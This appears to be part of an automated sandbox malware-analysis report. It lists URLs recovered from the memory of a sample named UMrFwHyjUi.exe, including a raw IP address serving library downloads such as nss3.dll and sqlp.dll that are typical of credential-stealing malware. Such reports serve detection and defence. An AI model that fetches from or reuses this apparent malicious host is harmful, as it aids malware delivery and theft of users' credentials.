                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555099194.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555218963.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                          Source: UMrFwHyjUi.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                          Source: UMrFwHyjUi.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                          Source: UMrFwHyjUi.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
                          Source: UMrFwHyjUi.exeString found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
                          Source: UMrFwHyjUi.exeString found in binary or memory: http://ocsp.comodoca.com0
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555099194.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555099194.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0A
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555218963.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0N
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555099194.0000000000E09000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0X
                          Source: UMrFwHyjUi.exeString found in binary or memory: http://ocsp.sectigo.com0
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                          Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2714775634.000000003BDCE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2709007527.000000002FEEC000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555218963.0000000000DFE000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2694383485.000000001E097000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
                          Source: UMrFwHyjUi.exe, UMrFwHyjUi.exe, 00000002.00000002.2720919729.000000006CEFD000.00000002.00000001.01000000.00000009.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2701990991.000000002400B000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.2.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2694126228.000000001DC3D000.00000002.00001000.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2690551002.0000000017C91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                          Source: 76561199786602107[1].htm.2.drString found in binary or memory: https://95.217.220.103
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2572052639.0000000000E12000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/%M
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/)
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555099194.0000000000E12000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/-
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/.
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/5
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/9M
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/=M
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/O
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/QMty
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2560144909.0000000000E12000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555099194.0000000000E12000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/U
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/UMHy
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/freebl3.dll
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/freebl3.dllm
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/mozglue.dll
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/msvcp140.dll
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2572165700.0000000000E70000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2555160578.0000000000E79000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2571836136.0000000000E70000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/nss3.dll
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2572165700.0000000000E70000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2571836136.0000000000E70000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/nss3.dll:
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/ography
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988407679.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2003941847.0000000000DA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/rosoft
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/softokn3.dll
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/softokn3.dllC
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/sqlp.dll
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000D20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/sqlp.dllu
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/uM
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/vcruntime140.dll
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103AAK
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2285755720.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, CFHDHI.2.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                          Source: 76561199786602107[1].htm.2.drString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp, CAAEBF.2.drString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E07000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp, CAAEBF.2.drString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2285755720.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, CFHDHI.2.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1949428000.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2285755720.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, CFHDHI.2.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2285755720.0000000000E94000.00000004.00000020.00020000.00000000.sdmp, CFHDHI.2.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                          Source: UMrFwHyjUi.exe, 00000002.00000003.1948179639.0000000000DAA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/css/applications/community/main.css?v=Pwd1k_5lFECQ&l=en
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/css/globalv2.css?v=dQy8Omh4p9PH&l=english
                          Source: UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/css/promo/summer2017/stickers.css?v=P8gOPraCSjV6&l=engl
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/css/skin_1/header.css?v=pTvrRy1pm52p&l=english
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/css/skin_1/profilev2.css?v=t9xiI4DlPpEB&l=english
                          Source: UMrFwHyjUi.exe, 00000002.00000003.2019254512.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1961237151.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034989211.0000000000DA8000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1988465728.0000000000DAA000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2004011791.0000000000DE3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.1949370726.0000000000D9C000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000003.2034944116.0000000000DA3000.00000004.00000020.00020000.00000000.sdmp, UMrFwHyjUi.exe, 00000002.00000002.2685798146.0000000000DA9000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
